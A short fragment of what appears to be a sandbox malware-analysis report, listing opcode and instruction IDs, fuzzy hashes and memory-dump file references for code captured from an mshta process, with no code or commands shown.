                                                                                                • API String ID: 0-2029458087
                                                                                                • Opcode ID: b7a3aae232dce9f2f8c7d4126e4f8909e618b46f0d6e5a9ad2b49f4b46aaaa25
                                                                                                • Instruction ID: 5e13f6fe522bb076fe87e71325646a57622139daf4ce0a560ec16909dcc1264a
                                                                                                • Opcode Fuzzy Hash: b7a3aae232dce9f2f8c7d4126e4f8909e618b46f0d6e5a9ad2b49f4b46aaaa25
                                                                                                • Instruction Fuzzy Hash: D521141190E7C54FE747933828652A1BFB2AF57214B5E00DBD489CF1B3E40D4EAAC362
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000003.469826327.00000000029D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_3_29d0000_mshta.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction ID: 67e76dc1c73e36f3db2bc0b6d7daf0ec1cc2853d409592385e390610c388bcee
                                                                                                • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                                • Instruction Fuzzy Hash: